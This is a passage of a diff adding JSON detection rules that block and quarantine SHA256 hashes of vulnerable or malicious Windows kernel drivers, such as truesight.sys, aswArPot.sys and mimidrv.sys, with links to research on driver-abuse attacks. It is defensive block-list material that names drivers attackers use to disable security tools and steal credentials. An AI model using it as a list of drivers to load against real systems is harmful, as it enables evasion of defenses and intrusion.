[https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc607bc5-ba62-5e5f-ba19-7d16421e9ee3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453519Z", + "creation_date": "2026-03-23T11:45:30.453523Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453532Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "75f1bea34e2bb1d26cf173eba44daeb9bbee8106d43b911a01f73f76be17a165", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc612226-d7f3-5d7c-b364-f94b6571a046", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157136Z", + 
"creation_date": "2026-03-23T11:45:31.157138Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157143Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae9800e70d6d3511f5e93204310d8d895827d81df2f27f0d662e7ac11bd47527", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc706fe6-290e-564b-bdfe-5ca26b21bb54", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827362Z", + "creation_date": "2026-03-23T11:45:30.827364Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827370Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd2560bd492ed88f4822a7ce4cd8e4f47f2727895964edcd0f7fe5a419910cb3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc71c3d9-04ba-5176-8338-01946c39af90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970140Z", + "creation_date": "2026-03-23T11:45:29.970142Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970147Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11f0f2395b3e7a9849bf3f050bfda6b48ae2de856d8541a16b51d9097afb8306", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc781622-d418-5abf-b731-3ff4bc61b109", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.496055Z", + "creation_date": "2026-03-23T11:45:31.496057Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.496063Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49e6c9a0b3d0e5c6141cdeb33c767d05eccc063e742bc49759ab1f36b04064af", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc78bd8b-1b82-5f69-834b-5eba7ba9e08f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462584Z", + "creation_date": "2026-03-23T11:45:30.462587Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462596Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dcd026fd2ff8d517e2779d67b3d2d5f9a7aa39f19c66fa8ff2cab66d5c6461c6", + "comment": "Vulnerable Kernel Driver (aka yyprotect64.sys) [https://www.loldrivers.io/drivers/12ccd18a-11da-495a-b4b4-98a2f2bff180/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc8e3dc7-a375-5e8c-89d4-5c34bc2380ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816240Z", + "creation_date": "2026-03-23T11:45:31.816243Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816250Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97b180382d816c8f3f507d946a7f519f5d319e9de97a8ce56f4a447e9ab2ef54", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc994e02-e98f-5d16-b93c-9146b6491e46", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142747Z", + "creation_date": "2026-03-23T11:45:32.142749Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142755Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "0fe75edf9d4bdceb2dd9e4919a3b10f9d3305065862288cad09beb4f385f5410", + "comment": "Vulnerable IKARUS anti.virus Driver (aka ntguard.sys and ntguard_x64.sys) [https://www.greyhathacker.net/?p=995, https://www.exploit-db.com/exploits/43139] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc9ea2c4-7bdd-589f-a1c4-c3a77d053de4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475674Z", + "creation_date": "2026-03-23T11:45:30.475678Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475686Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e219276a4068b1eea5ce08f83a322845dce4eca89e05c71a0c2417065ce48813", + "comment": "Vulnerable Kernel Driver (aka directio64.sys) [https://www.loldrivers.io/drivers/a254e684-f6eb-40c4-a50a-7b76feb6cc02/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dcad2987-98ae-5a0a-8118-9d1c45a3190b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821076Z", + "creation_date": "2026-03-23T11:45:31.821078Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7bc0a85db87d08a0dda93cbece19ce70935bac4a44452bb1c3658657d1204755", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dcaef3cf-2013-56bd-b328-535dc5180f8c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973518Z", + "creation_date": "2026-03-23T11:45:29.973520Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973525Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2afdb3278a7b57466a103024aef9ff7f41c73a19bab843a8ebf3d3c4d4e82b30", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] 
[https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dcb19b73-9469-5fa5-8b16-18a8950388e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982886Z", + "creation_date": "2026-03-23T11:45:29.982888Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982894Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "786f0ba14567a7e19192645ad4e40bee6df259abf2fbdfda35b6a38f8493d6cc", + "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dcb50a31-e2bb-5a8d-b3e1-ad1361176008", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155889Z", + "creation_date": "2026-03-23T11:45:31.155891Z", + "enabled": true, + "block_on_agent": 
true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed4f8a397efd1c69890accc39c3b17d9914add78e8ed14f7225252834d9ee434", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dcd39f18-6233-5d23-bee1-2d34a63cd44f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493542Z", + "creation_date": "2026-03-23T11:45:31.493545Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493554Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c28d0a74e1d185b36de46a4aa356d13900f3549efc0c930c0cbe91fac8a990d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dcd5b66d-7f03-58c4-91a3-4a9b8ff4cdc9", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157334Z", + "creation_date": "2026-03-23T11:45:31.157336Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157342Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "edd412e4406e2b863c48c4aca4192a63f4a9617f93eccea8c82c735629a2f38b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dce66a4f-9eef-5b97-a470-95bf7bb1f25a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831254Z", + "creation_date": "2026-03-23T11:45:30.831256Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.831262Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da00248fe367e7d220824c27f2bd02e2bb3ea467fd76d3cdfee8f62e5d83cbcb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dce88221-6fca-567c-b0ee-4ebed5fd8d88", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477773Z", + "creation_date": "2026-03-23T11:45:31.477777Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477786Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7666194867593ceaf7a3349f0edf794c46b58a2b15cb957ddd00c526acde7c6e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dcf7fb18-4540-5118-b212-12056498abf4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142790Z", + "creation_date": "2026-03-23T11:45:32.142792Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142798Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "592979e894d4c0af645e0bd70d23333facbb7c5b7e35e9b19a9acd564aa97c09", + "comment": "Vulnerable VirIT Agent System Driver (aka viragt64.sys) [https://www.trendmicro.com/en_no/research/24/a/kasseika-ransomware-deploys-byovd-attacks-abuses-psexec-and-expl.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd13aa27-0a09-557f-8e2e-9d7814869057", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823519Z", + "creation_date": "2026-03-23T11:45:30.823521Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823527Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": 
null, + "references": [], + "type": "hash", + "value": "9dada726191185a41663f42cee4cb63eca0cf6ec6204fec8851c1dce940e217b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd1e3335-5f2c-59e4-8afc-68d5d62793ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463756Z", + "creation_date": "2026-03-23T11:45:30.463760Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463768Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10ad50fcb360dcab8539ea322aaf2270565dc835b7535790937348523d723d6b", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd27cfac-bf08-50cf-9c50-fe0889c21411", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810611Z", + "creation_date": "2026-03-23T11:45:31.810613Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810618Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85ad9817ec0f48919fd21bcc911888b06f289c6ccdf28566c3cfcbd1c66c526c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd30c565-5ede-54b1-900a-f91e6bc8d323", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812813Z", + "creation_date": "2026-03-23T11:45:31.812816Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812825Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e3b00d5e6e0e37ecb2498274d84feba9fe87376241112e6605a397b2f8852f98", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd3dcbf6-25e1-5fb0-84dc-cdfa4b7a71a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823155Z", + "creation_date": "2026-03-23T11:45:31.823158Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823165Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8f09a7c1c7fac1ed11ce285ab6b8e1635b645ca7dfffd4cd165cbe36d99e80b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd519426-73e9-5f9a-a14f-ac15681728ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.141201Z", + "creation_date": "2026-03-23T11:45:31.141203Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141209Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "04b9dc21b67e08fa55fb644e7758cbef7e2dcf81c065bb70fe122c79e80b5c51", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dd5f9a2b-69b1-59a5-b0b1-2fe89c52cd1f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 